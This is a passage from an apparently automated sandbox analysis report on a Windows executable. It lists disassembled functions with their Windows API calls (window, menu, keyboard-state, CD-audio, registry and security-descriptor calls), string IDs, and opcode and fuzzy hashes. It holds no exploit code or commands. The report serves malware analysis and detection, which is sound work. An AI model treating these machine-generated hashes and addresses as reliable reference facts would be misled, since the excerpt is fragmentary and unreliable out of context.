                                                    • Opcode Fuzzy Hash: 7f51b98ad23ac4969c8cd5e481943e7d086ef8c1f6e4450c7ac4d9fe67dfa88e
                                                    • Instruction Fuzzy Hash: 7C9193742047019FDB15EF21C851B6EB7A1AF84314F01845EF89A5F7A2CB78ED4ACB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044A428, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 210windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(00000000,?), ref: 0044A542
                                                    • CreateWindowExW.USER32 ref: 0044A5BC
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044A5DE
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A5F1
                                                    • DestroyWindow.USER32(00000000), ref: 0044A613
                                                    • CreateWindowExW.USER32 ref: 0044A64A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A663
                                                    • GetDesktopWindow.USER32 ref: 0044A67C
                                                    • GetWindowRect.USER32 ref: 0044A683
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044A69B
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044A6B3
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1652260434-3619404913
                                                    • Opcode ID: e51dbac5d2547b16bfa9929b1113656f1bdfcf14e697409c4a72b3f04298990d
                                                    • Instruction ID: b58e7e2a189021973f37c6321ef9e87586c5349f807a24c0cba3effbbceab856
                                                    • Opcode Fuzzy Hash: e51dbac5d2547b16bfa9929b1113656f1bdfcf14e697409c4a72b3f04298990d
                                                    • Instruction Fuzzy Hash: BC71A271140204AFE711DF28CC49F6B7BE9FB89304F49492EF985872A0C775E916CB5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044BAB8, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 201windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32 ref: 0044BB6E
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BBCA
                                                    • LoadImageW.USER32 ref: 0044BC03
                                                    • LoadImageW.USER32 ref: 0044BC46
                                                    • LoadImageW.USER32 ref: 0044BC7D
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BC89
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044BC99
                                                    • DestroyIcon.USER32(?,?,?,?,?,00449431,?,?,?,?,?,?), ref: 0044BCA8
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044BCC5
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044BCD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1446636887-1154884017
                                                    • Opcode ID: 1cfb3c9ffd1603d409ebc5b5e7b14bdc1beb6995690cdfffffd704eeab8c7ce7
                                                    • Instruction ID: f99eee46775d20260677c7befaf403ff0622e8b0adfb419b4cfe2628ff83318d
                                                    • Opcode Fuzzy Hash: 1cfb3c9ffd1603d409ebc5b5e7b14bdc1beb6995690cdfffffd704eeab8c7ce7
                                                    • Instruction Fuzzy Hash: EF61D271540254BAFB14DF64DC86FBB7BACEB08711F10412AF915DA1C0DB78E994CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A5BD, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0042A636
                                                    • GetDriveTypeW.KERNEL32 ref: 0042A683
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A6CB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A702
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A730
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1600147383-4113822522
                                                    • Opcode ID: 907c0007e038ddd30fe2239ecfe8121d52e3b1b35e0aa4d3e00761c3812f8d4f
                                                    • Instruction ID: a76f95b594c024ae8f55597a4f1b1413d74c1490bfe6620e3b6e4b9ef69dd47e
                                                    • Opcode Fuzzy Hash: 907c0007e038ddd30fe2239ecfe8121d52e3b1b35e0aa4d3e00761c3812f8d4f
                                                    • Instruction Fuzzy Hash: 70516C751042049FC301EF20D881E6AB3F4EF94718F54896DF88A9B251DB35EE0ACB46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044BCED, Relevance: 22.6, APIs: 15, Instructions: 138filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00449476,?,?), ref: 0044BD10
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD27
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD32
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD3F
                                                    • GlobalLock.KERNEL32 ref: 0044BD48
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD57
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD60
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00449476,?,?,?,?), ref: 0044BD67
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00449476,?,?,?,?), ref: 0044BD78
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00452CAC,?), ref: 0044BD91
                                                    • GlobalFree.KERNEL32 ref: 0044BDA1
                                                    • GetObjectW.GDI32(?,00000018,?,?,?,?,?,00449476,?,?,?,?), ref: 0044BDC5
                                                    • CopyImage.USER32 ref: 0044BDF0
                                                    • DeleteObject.GDI32(00000000), ref: 0044BE18
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044BE2E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 2c4c1a7f7210b6913c5ad451a4253a329c440a5707ce29204b8191015221adc7
                                                    • Instruction ID: df2a3beba135d088401c7f455d8b4552e4e8ec093c3fdeaf6a988b0a6805629c
                                                    • Opcode Fuzzy Hash: 2c4c1a7f7210b6913c5ad451a4253a329c440a5707ce29204b8191015221adc7
                                                    • Instruction Fuzzy Hash: 6B412979500208FFEB119FA4DC48EAB7BBCFB8A751F20406AF905D6260C7759905DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004183F4, Relevance: 19.7, APIs: 13, Instructions: 185memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                      • Part of subcall function 0041874A: GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                      • Part of subcall function 0041874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                      • Part of subcall function 0041874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                      • Part of subcall function 0041874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                      • Part of subcall function 004187E7: GetProcessHeap.KERNEL32(00000008,?,?,?,?,0041843D,?), ref: 004187F3
                                                      • Part of subcall function 004187E7: HeapAlloc.KERNEL32(00000000,?,?,?,0041843D,?), ref: 004187FA
                                                      • Part of subcall function 004187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,?,?,?,?,0041843D,?), ref: 0041880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00418458
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041848C
                                                    • GetLengthSid.ADVAPI32(?), ref: 0041849D
                                                    • GetAce.ADVAPI32(?,?,?), ref: 004184DA
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?), ref: 004184F6
                                                    • GetLengthSid.ADVAPI32(?), ref: 00418513
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00418522
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00418529
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041854A
                                                    • CopySid.ADVAPI32(00000000), ref: 00418551
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00418582
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?), ref: 004185A8
                                                    • SetUserObjectSecurity.USER32 ref: 004185BC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1795222879-0
                                                    • Opcode ID: 0ad6a2bda48f74fa75026afc6609c6229e19795523afed2234e9239218398caf
                                                    • Instruction ID: c63f0564a9c598274426e3303f651ca560af07e12c59bc13b7557c32bac375e1
                                                    • Opcode Fuzzy Hash: 0ad6a2bda48f74fa75026afc6609c6229e19795523afed2234e9239218398caf
                                                    • Instruction Fuzzy Hash: 13615875900209BFDF00DFA0DC45EEEBBB9FB45314F00862AF915A6291DB359A45CF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438BC0, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00438BEC
                                                    • CoInitialize.OLE32(00000000), ref: 00438C19
                                                    • CoUninitialize.OLE32 ref: 00438C23
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00438D23
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00438E50
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00452C0C), ref: 00438E84
                                                    • CoGetObject.OLE32(?,00000000,00452C0C,?), ref: 00438EA7
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00438EBA
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00438F3A
                                                    • VariantClear.OLEAUT32(?), ref: 00438F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,E
                                                    • API String ID: 2395222682-4052858919
                                                    • Opcode ID: f3730f682a9dd4bdf8ff26331d03620f7aa1eef298818af1903775e73f44107e
                                                    • Instruction ID: 42b68598aa01eb1ff928bfc81b5a388abd20b9d7da9a480141ba27ad61fd690d
                                                    • Opcode Fuzzy Hash: f3730f682a9dd4bdf8ff26331d03620f7aa1eef298818af1903775e73f44107e
                                                    • Instruction Fuzzy Hash: 8BC134B1208305AFD700EF64C884A2BB7E9BF89348F10496EF58ADB251DB75ED05CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C49C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 237windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0044C4EC
                                                    • GetFocus.USER32(?,?,?,?), ref: 0044C4FC
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0044C507
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0044C65D
                                                    • GetMenuItemCount.USER32 ref: 0044C67D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0044C690
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0044C6C4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0044C70C
                                                    • CheckMenuRadioItem.USER32 ref: 0044C744
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044C779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                    • String ID: 0
                                                    • API String ID: 1026556194-4108050209
                                                    • Opcode ID: 155fad4600b84c753740180cdc240737c6078d1219ae5eec0754cd6088fb8961
                                                    • Instruction ID: 252bbf29d8c51d527844162b782f3d8a0f6519524744514603bb5b4e898ab36f
                                                    • Opcode Fuzzy Hash: 155fad4600b84c753740180cdc240737c6078d1219ae5eec0754cd6088fb8961
                                                    • Instruction Fuzzy Hash: 6D819C7010A311AFE750DF14D884AAFBBE8FB89354F04492EF99593291C735E905CBAA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004410A5, Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 6f4ac6b568016aab02fb5505038652f8664a799c6973adb60268f3cf6041e326
                                                    • Instruction ID: e6ffd9e6d4b039e74129b0452aaea777ae9dcba8d4f56492cd5ed7c3180765e2
                                                    • Opcode Fuzzy Hash: 6f4ac6b568016aab02fb5505038652f8664a799c6973adb60268f3cf6041e326
                                                    • Instruction Fuzzy Hash: 9941C23014028E8BEF15EF90DC90AEB3724FF15350F408556FD959B2A1DB78AD8ACB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00425569, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004255D2
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004255E8
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004255F9
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0042560B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0042561C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: SendString
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 890592661-1007645807
                                                    • Opcode ID: 4eb8801e054d216dca51b622f7061b019b20f70c8e5b56d422b2162649c184e2
                                                    • Instruction ID: ed29e6c08dad34ccef379cf739d729c77d59275571fb851a89f8718a2312b79b
                                                    • Opcode Fuzzy Hash: 4eb8801e054d216dca51b622f7061b019b20f70c8e5b56d422b2162649c184e2
                                                    • Instruction Fuzzy Hash: F711B22165016979E721BAB1DC8AEFF7F3CEFD2B40F50402BB809A60D1DA691D05CAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00425217, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0042521C
                                                      • Part of subcall function 003E0719: timeGetTime.WINMM(?,77438EC0,003D0FF9), ref: 003E071D
                                                    • Sleep.KERNEL32(0000000A), ref: 00425248
                                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0042526C
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0042528E
                                                    • SetActiveWindow.USER32 ref: 004252AD
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004252BB
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004252DA
                                                    • Sleep.KERNEL32(000000FA), ref: 004252E5
                                                    • IsWindow.USER32 ref: 004252F1
                                                    • EndDialog.USER32(00000000), ref: 00425302
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 4732df5ecdcb78d6ee4d79f6d401cab4ed919ca38e366cdef2579569a919a1aa
                                                    • Instruction ID: 1a35f79e0c67130aa8dd62259c29ea87c5e1f86cda06a1f9863153446abf7f33
                                                    • Opcode Fuzzy Hash: 4732df5ecdcb78d6ee4d79f6d401cab4ed919ca38e366cdef2579569a919a1aa
                                                    • Instruction Fuzzy Hash: 96219274304714FFE7005B20FD89A2A3B69EB4639AB9018BEF405852B1DB799C458B3E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C45DF, Relevance: 18.2, APIs: 12, Instructions: 226windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemCount.USER32 ref: 003FD7CD
                                                    • GetMenuItemCount.USER32 ref: 003FD87D
                                                    • GetCursorPos.USER32(?), ref: 003FD8C1
                                                    • SetForegroundWindow.USER32(00000000), ref: 003FD8CA
                                                    • TrackPopupMenuEx.USER32(00486890,00000000,?,00000000,00000000,00000000), ref: 003FD8DD
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003FD8E9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID:
                                                    • API String ID: 36266755-0
                                                    • Opcode ID: 522402264e95e9b97f29e5cfc4c70c7e98202137d26716d311e3922d7bf1c2a2
                                                    • Instruction ID: db9083b0c1e4daa84bcea29ca01355faa9ffb71df3bc00b16e14b01bae714d38
                                                    • Opcode Fuzzy Hash: 522402264e95e9b97f29e5cfc4c70c7e98202137d26716d311e3922d7bf1c2a2
                                                    • Instruction Fuzzy Hash: 7D712971604219BEFB329F15DC49FAABF69FF05364F20022AF215AA0D1C7B56824DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042052C, Relevance: 18.2, APIs: 12, Instructions: 192keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 004205A7
                                                    • SetKeyboardState.USER32(?), ref: 00420612
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00420632
                                                    • GetKeyState.USER32(000000A0), ref: 00420649
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00420678
                                                    • GetKeyState.USER32(000000A1), ref: 00420689
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004206B5
                                                    • GetKeyState.USER32(00000011), ref: 004206C3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 004206EC
                                                    • GetKeyState.USER32(00000012), ref: 004206FA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00420723
                                                    • GetKeyState.USER32(0000005B), ref: 00420731
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a1c0b258ad37c20466d367bce14d8c85532f1d3f487049068e22847fd87e31de
                                                    • Instruction ID: 72b28b1226b40cecf502d3d6f120150051a346ff5db5bf307d653b73e0311a3c
                                                    • Opcode Fuzzy Hash: a1c0b258ad37c20466d367bce14d8c85532f1d3f487049068e22847fd87e31de
                                                    • Instruction Fuzzy Hash: C351EE20B047A429FB34DBA0A4557EBAFF49F11380F88459FD5C1562C3DA6C9A8CCB6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041C72A, Relevance: 18.2, APIs: 12, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32 ref: 0041C746
                                                    • GetWindowRect.USER32 ref: 0041C758
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041C7B6
                                                    • GetDlgItem.USER32 ref: 0041C7C1
                                                    • GetWindowRect.USER32 ref: 0041C7D3
                                                    • MoveWindow.USER32(00000001,?,?,00000001,?,00000000), ref: 0041C827
                                                    • GetDlgItem.USER32 ref: 0041C835
                                                    • GetWindowRect.USER32 ref: 0041C846
                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 0041C889
                                                    • GetDlgItem.USER32 ref: 0041C897
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000000), ref: 0041C8B4
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0041C8C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: dedd068e6a94ac5521fb954f57765ea50509b8902c5609bc90780fb3a49fa0d4
                                                    • Instruction ID: 1e77448fada0b42a4b75d5ff8280ece9c27990236fc0fbadf78c2ca899324eb4
                                                    • Opcode Fuzzy Hash: dedd068e6a94ac5521fb954f57765ea50509b8902c5609bc90780fb3a49fa0d4
                                                    • Instruction Fuzzy Hash: FC5183B5A40205BFEB04CFA8DD89EBF7BB9EB85311F10812EF515D2290D7709944CB24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C201B, Relevance: 18.2, APIs: 12, Instructions: 172timeCOMMON
